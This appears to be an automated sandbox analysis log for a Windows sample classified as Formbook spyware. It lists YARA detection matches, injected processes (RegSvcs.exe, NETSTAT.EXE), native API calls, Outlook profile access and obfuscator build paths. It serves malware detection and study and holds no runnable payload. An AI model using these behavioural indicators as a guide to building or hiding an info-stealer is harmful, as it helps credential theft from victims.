      Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.318189289.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: Process Memory Space: RegSvcs.exe PID: 5148, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: NETSTAT.EXE PID: 4844, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000001.00000002.318189289.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: Process Memory Space: RegSvcs.exe PID: 5148, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: Process Memory Space: NETSTAT.EXE PID: 4844, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 012FB150 appears 136 times
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0359B150 appears 87 times
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_01339910
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013399A0 NtCreateSection,LdrInitializeThunk,1_2_013399A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339860 NtQuerySystemInformation,LdrInitializeThunk,1_2_01339860
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339840 NtDelayExecution,LdrInitializeThunk,1_2_01339840
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013398F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_013398F0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339A20 NtResumeThread,LdrInitializeThunk,1_2_01339A20
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_01339A00
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339A50 NtCreateFile,LdrInitializeThunk,1_2_01339A50
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339540 NtReadFile,LdrInitializeThunk,1_2_01339540
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013395D0 NtClose,LdrInitializeThunk,1_2_013395D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339710 NtQueryInformationToken,LdrInitializeThunk,1_2_01339710
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013397A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_013397A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339780 NtMapViewOfSection,LdrInitializeThunk,1_2_01339780
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339FE0 NtCreateMutant,LdrInitializeThunk,1_2_01339FE0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_01339660
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013396E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_013396E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339950 NtQueueApcThread,1_2_01339950
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013399D0 NtCreateProcessEx,1_2_013399D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339820 NtEnumerateKey,1_2_01339820
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0133B040 NtSuspendThread,1_2_0133B040
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013398A0 NtWriteVirtualMemory,1_2_013398A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339B00 NtSetValueKey,1_2_01339B00
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0133A3B0 NtGetContextThread,1_2_0133A3B0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339A10 NtQuerySection,1_2_01339A10
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339A80 NtOpenDirectoryObject,1_2_01339A80
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0133AD30 NtSetContextThread,1_2_0133AD30
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339520 NtWaitForSingleObject,1_2_01339520
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339560 NtWriteFile,1_2_01339560
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013395F0 NtQueryInformationFile,1_2_013395F0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339730 NtQueryVirtualMemory,1_2_01339730
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0133A710 NtOpenProcessToken,1_2_0133A710
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0133A770 NtOpenThread,1_2_0133A770
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339770 NtSetInformationFile,1_2_01339770
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339760 NtOpenProcess,1_2_01339760
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339610 NtEnumerateValueKey,1_2_01339610
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339670 NtQueryInformationProcess,1_2_01339670
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01339650 NtQueryValueKey,1_2_01339650
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013396D0 NtCreateKey,1_2_013396D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041E087 NtAllocateVirtualMemory,1_2_0041E087
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004012A4 NtProtectVirtualMemory,1_2_004012A4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041DEA7 NtCreateFile,1_2_0041DEA7
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041DF57 NtReadFile,1_2_0041DF57
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041DFD7 NtClose,1_2_0041DFD7
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041E083 NtAllocateVirtualMemory,1_2_0041E083
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004014E9 NtProtectVirtualMemory,1_2_004014E9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041DEA1 NtCreateFile,1_2_0041DEA1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041DFD1 NtClose,1_2_0041DFD1
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9A50 NtCreateFile,LdrInitializeThunk,10_2_035D9A50
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_035D9910
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D99A0 NtCreateSection,LdrInitializeThunk,10_2_035D99A0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9840 NtDelayExecution,LdrInitializeThunk,10_2_035D9840
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9860 NtQuerySystemInformation,LdrInitializeThunk,10_2_035D9860
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9710 NtQueryInformationToken,LdrInitializeThunk,10_2_035D9710
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9FE0 NtCreateMutant,LdrInitializeThunk,10_2_035D9FE0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9780 NtMapViewOfSection,LdrInitializeThunk,10_2_035D9780
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9650 NtQueryValueKey,LdrInitializeThunk,10_2_035D9650
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9660 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_035D9660
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9610 NtEnumerateValueKey,LdrInitializeThunk,10_2_035D9610
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D96D0 NtCreateKey,LdrInitializeThunk,10_2_035D96D0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D96E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_035D96E0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9540 NtReadFile,LdrInitializeThunk,10_2_035D9540
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9560 NtWriteFile,LdrInitializeThunk,10_2_035D9560
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D95D0 NtClose,LdrInitializeThunk,10_2_035D95D0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9B00 NtSetValueKey,10_2_035D9B00
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035DA3B0 NtGetContextThread,10_2_035DA3B0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9A10 NtQuerySection,10_2_035D9A10
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9A00 NtProtectVirtualMemory,10_2_035D9A00
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9A20 NtResumeThread,10_2_035D9A20
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9A80 NtOpenDirectoryObject,10_2_035D9A80
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9950 NtQueueApcThread,10_2_035D9950
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D99D0 NtCreateProcessEx,10_2_035D99D0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035DB040 NtSuspendThread,10_2_035DB040
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9820 NtEnumerateKey,10_2_035D9820
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D98F0 NtReadVirtualMemory,10_2_035D98F0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D98A0 NtWriteVirtualMemory,10_2_035D98A0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035DA770 NtOpenThread,10_2_035DA770
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9770 NtSetInformationFile,10_2_035D9770
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9760 NtOpenProcess,10_2_035D9760
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035DA710 NtOpenProcessToken,10_2_035DA710
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9730 NtQueryVirtualMemory,10_2_035D9730
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D97A0 NtUnmapViewOfSection,10_2_035D97A0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9670 NtQueryInformationProcess,10_2_035D9670
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035DAD30 NtSetContextThread,10_2_035DAD30
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D9520 NtWaitForSingleObject,10_2_035D9520
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_035D95F0 NtQueryInformationFile,10_2_035D95F0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDC8A0 NtClose,10_2_00BDC8A0
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDC820 NtReadFile,10_2_00BDC820
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDC870 NtDeleteFile,10_2_00BDC870
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDC950 NtAllocateVirtualMemory,10_2_00BDC950
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDC770 NtCreateFile,10_2_00BDC770
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDC89A NtClose,10_2_00BDC89A
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDC8CA NtDeleteFile,10_2_00BDC8CA
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDC94C NtAllocateVirtualMemory,10_2_00BDC94C
      Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00BDC76A NtCreateFile,10_2_00BDC76A
      Source: NHYGUnNN.exeStatic PE information: No import functions for PE file found
      Source: NHYGUnNN.exe, 00000000.00000002.237146160.0000012A25D66000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHMMCXNXCJKFD.exe: vs NHYGUnNN.exe
      Source: NHYGUnNN.exe, 00000000.00000002.238037858.0000012A279A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBUMBUM.dll. vs NHYGUnNN.exe
      Source: NHYGUnNN.exe, 00000000.00000002.237199303.0000012A25EE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs NHYGUnNN.exe
      Source: NHYGUnNN.exe, 00000000.00000002.237890834.0000012A27840000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBUMBUM.dll. vs NHYGUnNN.exe
      Source: NHYGUnNN.exeBinary or memory string: OriginalFilenameHMMCXNXCJKFD.exe: vs NHYGUnNN.exe
      Source: NHYGUnNN.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: NHYGUnNN.exeReversingLabs: Detection: 27%
      Source: C:\Users\user\Desktop\NHYGUnNN.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknown Process created: C:\Users\user\Desktop\NHYGUnNN.exe C:\Users\user\Desktop\NHYGUnNN.exe
      Source: C:\Users\user\Desktop\NHYGUnNN.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe
      Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
      Source: C:\Windows\SysWOW64\NETSTAT.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
      Source: C:\Users\user\Desktop\NHYGUnNN.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\NHYGUnNN.exe.log
      Source: C:\Windows\SysWOW64\NETSTAT.EXE File created: C:\Users\user\AppData\Local\Temp\1--Lt08NN
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/2@6/6
      Source: NHYGUnNN.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 47.53%
      Source: C:\Users\user\Desktop\NHYGUnNN.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
      Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\SysWOW64\NETSTAT.EXE Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
      Source: NHYGUnNN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: NHYGUnNN.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: NHYGUnNN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\HMMCXNXCJKFD.pdb source: NHYGUnNN.exe
      Source: Binary string: RegSvcs.pdb, source: NETSTAT.EXE, 0000000A.00000002.501502525.00000000038B3000.00000004.10000000.00040000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000001.00000003.237929727.0000000001137000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000003.236683417.0000000000F98000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.320124356.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.318032789.00000000031D3000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BUMBUM.pdb source: NHYGUnNN.exe, 00000000.00000002.238037858.0000012A279A8000.00000004.00000800.00020000.00000000.sdmp, NHYGUnNN.exe, 00000000.00000002.237890834.0000012A27840000.00000004.08000000.00040000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000001.00000003.237929727.0000000001137000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000003.236683417.0000000000F98000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.320124356.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.318032789.00000000031D3000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp
